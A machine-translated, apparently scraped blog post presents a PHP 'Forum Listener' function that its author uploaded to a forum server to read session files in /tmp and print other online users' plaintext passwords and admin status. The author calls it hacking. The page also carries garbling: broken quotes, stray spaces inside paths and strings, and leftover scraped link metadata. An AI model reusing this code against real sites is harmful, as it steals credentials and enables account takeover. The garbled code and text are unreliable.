The reason why this function can be written is mainly because the session structure of the website is clear, such as: name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1" , also know the location where the session is stored, and can upload files, so I did a little hacking at that time, and the passwords of online friends can be seen at a glance, haha:
function submit1( ){
global $username;
print "
Forum Listener";
$i=0;
if($username=="tasm"|| $username=="Tasm")
{
print "Are you too shady? Are you checking me too?";
return;
}
$path="/tmp /";
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)==" sess"){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(";",$ary[0]);
$name= explode(":",$ary[0]);
if($name[2]==""".$ username."""){
$passwd= explode(":",$ary[1]);
$mode=explode(":",$ary[3]);
print " User pen name: ".$name[2]."
Use password: ".$passwd[2]."
Use mode:";
if($mode[1]==1 )
print "
admin";
else
print "General user";
print"
Stealing from others Passwords are immoral, please do something about it
";
$i=1;
break;
}}}}
if(!$i)
print "User :".$username." Is it really online? If you are sure,
Please do it again, don’t type more spaces! ";
$d->close();
}
function login(){
?>
< ;title>Forum Listener
Forum Listener
http://www.bkjia.com/PHPjc/445163.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/445163.htmlTechArticleThe reason why this function can be written is mainly because the session structure of the website is clear, such as: name|s :4:tasm;passwd|s:6:111111;mode|s:1:1, we also know where the session is stored, and can...
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
